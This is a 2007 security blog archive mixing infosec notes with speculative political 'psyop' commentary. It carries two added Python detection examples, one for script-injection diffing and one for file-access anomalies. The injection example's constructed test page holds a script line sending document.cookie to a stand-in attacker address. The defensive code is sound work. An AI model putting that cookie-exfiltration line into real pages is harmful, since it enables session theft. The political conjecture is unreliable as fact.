but reinventing it has been fun... can't give a ton o details here, but it is in part a scriptified build of a server, which if you follow the happy path (read: dhcp) involves only a few hits of the enter key... it's not quite done, but it's nifty where it stands today, and it involves building gentoo servers w/ SSP and PaX and other good security foo, combined w/ programming... what could be better than that?

anywho, now i've updated my blizzle, so mb my homie will stop giving me crap...

anywho, good sec posts to come within a week... being busy is such a two edged sword :-\

Friday, September 14, 2007

sec roundup

koo koo, now a scoped down sec post...

so recently there was this article about how MS moving into the Linux space w/ Novell was them subverting *nix and OSS, and how we should all scream that the sky is falling and MS is coming to murder our kids while we're being distracted by the sky...

i don't really buy it. imo, it seems to me that *nix and OSS have been so successful that MS adopts a strategy which consists of purchasing new teams of developers who might write better code which leverages code which is already good and not full of tons o legacy bugs and conventions.

this is merely an extension of a phenomenon we all saw w/ the introduction of competition into the browser market back in the day. successful alternate browsers (such as firefox) forced MS to dust off their IE dev team and start making IE updates post-netscape navigator.

MS trying to make better products that customers want isn't going to "hurt" OSS or linux. Ultimately, this move by MS can only be successful if they produce apps which fill the demands being satisfied by major nix and oss projects today: value, quality, performance, etc. this benefits everyone...

and for what it's worth, i was just at a client site last week where they said that Novell ZENworks endpoint security is nifty and full of cool sec bits... oh yea, and it runs on windows too... lol...

oh yea, looks like spammers are attacking anti-spammers yet again... the article ends on an interesting idea of spamware blocking anti-spam measures on the client... that'd be an interesting evolution of the arms race if it hasn't actually happened already.

you know, if they feel they have to jack things up, instead of degrading bit-torrent downloads (which btw 1: can be legitimate and 2: i actually want) maybe our ISPs could start down the slippery slope of meddling w/ the internet by degrading things that i _don't_ want, like spam...

[PSYOP Update I]

so now we're gonna have broken out psyop posts, cause there is so much i don't want to mix it in w/ regular sec...

as others have noticed, there is some weird ass stuff going on w/ some US nukes. i am _ashamed_ to say that i saw this on sunday the 9th, and didn't think twice to say anything but "well that sure is a screwup". mb it is b/c i still hold out an underlying hope that no matter how far this thing goes, we won't see the use of even "tactical" nuclear weapons... anywho, this incident is either an ironic and unprecedented (?) mistake, or else it implies bad things to come.

iran is still in the news. looks like they're fighting back, presumably showing that they can dork up our economy... my prediction machine thinks this can be spun as an act of aggression...

in order to reduce the likelihood of some unfortunate precipitating event, we've decided to construct a base right on the iranian border... >cough<>cough<bullshit>cough<... the article notes something that sounds like the last war sales pitch:
[the US has] shifted its focus from Iran's alleged nuclear weapons program to its alleged shipment of IEDs across the Iraq-Iran border as the principal rationale in selling a possible attack

so then this story about insurgents using russian-made armor-piercing (shaped charge) grenades to kill US soldiers... this strikes me as quite similar to the EFP issue, and it sounds like iran is gonna be fingered w/ supplying these weapons...

[tangent]
speaking of russia... been seeing some cold-war-ish military maneuvers... and dissolving govt is always a sign of stability... and the best being a ginormous bomb test... note that it is the 'father of all bombs', which i guess is intended to be more manly than our MOAB?

it may or may not be worth noting that this is a thermobaric weapon... described as inhumane, cruel, etc... also, we've been using smaller versions in afghanistan and iraq for some time now ...
[/tangent]

last but not least. so apparently some lady in pennsylvania took a picture of the smoke from the flight 93 crash right after it happened. turns out that she is being harassed and attacked by random and anonymous people; accused of doctoring the picture or using it in a get-rich scam... even though the FBI openly say they "have no reason to doubt" the legitimacy of the photo. sounds possibly similar to a tactic which seems to have been employed w/ some degree of success by scientologists: dead agenting

Thursday, September 13, 2007

back in town

back from training w/ juniper in dallas... good stuff all around, and good ppl too. here's a bit that helps me continue to believe there are corps that aren't all messed up:



anywho it was a good time. training and lab time and all of that; network focused. the dallas lab is pretty much something of everything from the product line (sometimes two; presumably when ha is expected) and some other interesting boxes. sry for the craptastic pic of part of it:



got some nda info on stuff in the pipe. not earth shattering (you've been hearing rumbles), but the outlined implementation is interesting.

i finally got to play w/ dynamic routing, and think i kinda understand it... ;)

Saturday, September 8, 2007

web2 application attack detection?

sooo, a blog post and the anti-rootkit blurb got me thinking...

i wonder if you could build a security framework based around a browser extension that either shimmed itself into the datastream or spawned a sniffer process which watched packets on the wire or both...

can a non-virtual rootkit lie to you about a pcap call, or are you accessing the device directly?

anyway, i don't know enough about web2 attacks to know how you'd go about it, but it seems like there may be a way to do either signature or anomaly detection by watching http(s [if you're an ssl termination point / proxy]?) payloads... maybe through comparing:

  • what a user is doing in the browser vs what the browser is doing out to inet
  • what an os shows as active http connections and what packets are really going out across the wire
  • cached site functionality to new site functionality/script tags/calls

or maybe just keywording simple functionalities and setting up some type of zoning or alerting...
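An added example for the third bullet (cached site functionality vs. new script tags); it is not code from the post, and the two HTML pages, the script URLs and the 198.51.100.7 address are constructed for the example. It inventories a page's external script sources and the SHA-256 of each inline script body, then diffs a fresh fetch against the cached baseline, which is the "what did this site start doing that it didn't do last week" check a browser-side monitor would run.

```python
import hashlib
from html.parser import HTMLParser


class ScriptInventory(HTMLParser):
    """Collect external script URLs and SHA-256 hashes of inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = set()
        self.inline = set()
        self._buf = None  # list while inside an inline <script>, else None

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.add(src)
        else:
            self._buf = []

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            body = "".join(self._buf).strip().encode("utf-8")
            self.inline.add(hashlib.sha256(body).hexdigest())
            self._buf = None


def inventory(html: str) -> ScriptInventory:
    inv = ScriptInventory()
    inv.feed(html)
    inv.close()
    return inv


def diff_scripts(baseline_html: str, current_html: str) -> dict:
    """Compare the cached copy of a page against a fresh fetch.

    Anything the current page loads or embeds that the baseline did not is
    what gets raised for review; removals are reported too, since a real
    deploy usually changes both sides while an injection only adds.
    """
    base, cur = inventory(baseline_html), inventory(current_html)
    return {
        "added_external": cur.external - base.external,
        "removed_external": base.external - cur.external,
        "inline_added": cur.inline - base.inline,
        "inline_removed": base.inline - cur.inline,
    }


def is_suspicious(report: dict) -> bool:
    """Alert on anything new; a changed inline script shows up as one added hash."""
    return bool(report["added_external"] or report["inline_added"])


# Constructed pages: the cached baseline, and a later fetch with one extra
# external script and a modified inline one (198.51.100.7 is a documentation
# address, standing in for an attacker-controlled host).
BASELINE_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script>var user = "guest";</script>
</head><body><p>hi</p></body></html>"""

CURRENT_PAGE = """<html><head>
<script src="/static/app.js"></script>
<script src="http://198.51.100.7/t.js"></script>
<script>var user = "guest"; new Image().src = "http://198.51.100.7/?" + document.cookie;</script>
</head><body><p>hi</p></body></html>"""


if __name__ == "__main__":
    report = diff_scripts(BASELINE_PAGE, CURRENT_PAGE)
    print(is_suspicious(report), report["added_external"])
```

The obvious gap is any script that is already expected but whose served bytes changed (`/static/app.js` above is only tracked by URL); hashing the fetched body of each external script closes that, and is what subresource integrity later standardized in the browser itself.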

...

ok, i promised myself i wouldn't post about the psyop thing again... but... i lied...



after talkin it up about suitcase bombs and wmd, we move on to:


HANNITY: I believe Iran is fighting a war by proxy. They're funding Hezbollah to the tune of $100 million a year. They're providing the IEDs that are being used to kill American soldiers and providing soldiers as part of the insurgency, battling our soldiers. How do you handle Iran?

THOMPSON: ... They [Iran] are killing our people as we speak ... basically reprocessing that uranium enough to get fissile material ... most experts think well on their way to making a nuclear weapon and, of course, they've threatened Israel ... They are perhaps getting closer to a revolution in Iran. That economy is so bad, the civil oppression is so bad against their own people, we've got some friends among those people there, there are some good things that can happen.

HANNITY: So that means that America must have a plan and prepare for possible military action if they're on the verge of getting nuclear weapons?

THOMPSON: Yes.


tell me this is projection... lol... either that or some weird deja vu-ish thing...

Friday, September 7, 2007

back to reality

i'm gonna cry if i ever unwittingly admin a system w/ a flaw like this...

best quote:

As a result of today's breach, new measures were being added to what he described as a multi-layered security operation.


yea... a multi-layered operation which consists of believing what you're told... these are not the droids you're looking for... nice demo of _simple_ social engineering brutalizing a formidable defense...

in other news, still kicking around the rootkit detection tool ideas... mb got something out of the box to tinker w/...

something completely different... rumor has it a massive psyop is running soonish... don't see it yet, but mb it's subtle and i'm just not paying attn...

Monday, September 3, 2007

taking the scope out a tad...

well, looks like sony produced another solid piece of security enhancing software. imo, (unless i'm not keeping up w/ current events properly) rootkits are ready for easy to deploy automated scanning tools... seems like they are mb taking up some of the slack of buffer overflow defense work... best quote:

When the original Sony rootkit scandal hit, a Sony executive originally dismissed it by saying that "most people, I think, don't even know what a rootkit is, so why should they care about it?"


does this seem like it might produce the type of negativism we've been trying to avoid here at home?

... [they] were consultants working with Marines at Camp Pendleton. They say they were humiliated ...


how do you turn allies into enemies? mb by making them feel like you don't see them as allies based on irrational fears? might be a stretch, but one could argue that this real-world issue is analogous to projecting information security into an environment...

speaking of RW security, has anyone else noticed the number of stories talking about things that are normally supposed to be secret...? like details of strategic and tactical military action? for the sources on these stories, are we seeing a minor revolt by the intelligence corps? did anyone else catch the bit about the rove resignation relating to iran? i saw an interview snippet in which he says he's leaving because he was asked to leave....

does the current usa admin team wonder if the tail could be wagging the dog? it seems like there might be other elements in the world looking to manipulate large geographic areas...

Wednesday, August 29, 2007

1st vid

in case you have 1.5 spare hrs...




i haven't gotten all the way through it yet, but i will...

Tuesday, August 28, 2007

nifty AD tool

soooo, i just heard about this new app made by the folks over at varonis...

basically, it crawls through your AD users and share perms, and can produce audit reports (for sox and the like) that say "this user has read access to these file/dirs, and full control on these files/dirs". it'll help you find open shares and all of that.

i can think of one company off the top of my head that could really use this app ;)

anywho, the nifty bit about it is that once you have it running (and you presumably have cleaned up your perms and all of that), then it begins to watch the patterns of file usage, and can generate reports on files which people have perms to but never access. and better than that, it can recognize changes in file access patterns. so in theory this will let you see a disgruntled employee attempting to do malicious things to data they have access to, or will let you see an employee copying data in preparation of leaving the company, etc....
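An added example of the access-pattern half of that, not the vendor's product or its logic: a per-user baseline of daily file-access volume and the shares each user normally touches, then a check of one day's activity for a volume spike or a share the user has never used. The log format (`day user op path`), the share names and all the log lines are constructed for the example.

```python
from collections import defaultdict
from statistics import mean


def parse(lines):
    """Constructed log format: 'YYYY-MM-DD user op path' -> (day, user, op, path)."""
    events = []
    for line in lines:
        day, user, op, path = line.split(maxsplit=3)
        events.append((day, user, op, path))
    return events


def share_of(path: str) -> str:
    """First path component, e.g. '/finance/ledger1.xls' -> 'finance'."""
    return path.strip("/").split("/", 1)[0]


def build_baseline(events):
    """Per user: mean accesses per observed day, and the set of shares ever touched."""
    per_day = defaultdict(lambda: defaultdict(int))  # user -> day -> count
    shares = defaultdict(set)
    for day, user, _op, path in events:
        per_day[user][day] += 1
        shares[user].add(share_of(path))
    return {
        user: {"daily_mean": mean(days.values()), "shares": shares[user]}
        for user, days in per_day.items()
    }


def detect(window_events, baseline, spike_factor=5.0):
    """Flag users whose single-day activity departs from their own baseline.

    Two signals, both relative to the user rather than to a global threshold:
    volume well above that user's daily mean (bulk copy before leaving), and
    any share the user has no history with (poking around where they never
    had a reason to). Users with no baseline at all are flagged for review.
    """
    counts = defaultdict(int)
    seen = defaultdict(set)
    for _day, user, _op, path in window_events:
        counts[user] += 1
        seen[user].add(share_of(path))

    alerts = {}
    for user, n in counts.items():
        base = baseline.get(user)
        reasons = []
        if base is None:
            reasons.append("no baseline for user")
        else:
            if n > spike_factor * base["daily_mean"]:
                reasons.append(f"volume {n} vs daily mean {base['daily_mean']:.1f}")
            new_shares = seen[user] - base["shares"]
            if new_shares:
                reasons.append(f"new shares {sorted(new_shares)}")
        if reasons:
            alerts[user] = reasons
    return alerts


# Constructed history: five quiet days, four reads each, everyone on their own share.
BASELINE_LOG = (
    [f"2007-08-{d:02d} alice read /eng/spec{i}.txt" for d in range(20, 25) for i in range(4)]
    + [f"2007-08-{d:02d} bob read /finance/ledger{i}.xls" for d in range(20, 25) for i in range(4)]
)

# Constructed observation day: alice as usual, bob bulk-reading finance plus a
# share he has never touched, carol with no history at all.
WINDOW_LOG = (
    [f"2007-08-27 alice read /eng/spec{i}.txt" for i in range(4)]
    + [f"2007-08-27 bob read /finance/ledger{i}.xls" for i in range(30)]
    + [f"2007-08-27 bob read /hr/salaries{i}.xls" for i in range(10)]
    + ["2007-08-27 carol read /eng/spec0.txt"]
)


def demo():
    return detect(parse(WINDOW_LOG), build_baseline(parse(BASELINE_LOG)))


if __name__ == "__main__":
    for user, reasons in demo().items():
        print(user, reasons)
```

The baseline is only trustworthy if it was built after the permission clean-up the post describes; a user who was already quietly reading the wrong share every day for a year looks perfectly normal to this check.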

unfortunately, they are a newer company and they might be a little too proud of their stuff... donno the details on pricing, but the rumor i heard was if you have a few hundred users, you might be pushing six figures.... ick...

Monday, August 27, 2007

looks like i've got a lot of reading to do

jdm is a busy sec blogger...

here's some light reading from my new boss... he says these techniques have application in infosec / forensic investigations...

and for RW reading, i'm in the middle of gray hat hacking... just skip the first section, which is a bunch of ethical foo, which most everyone either already subscribes to, or won't... from there it's been really good. i'm still early on, in an assessment area, but it looks like it gets to be really tech heavy into some good stuff later on...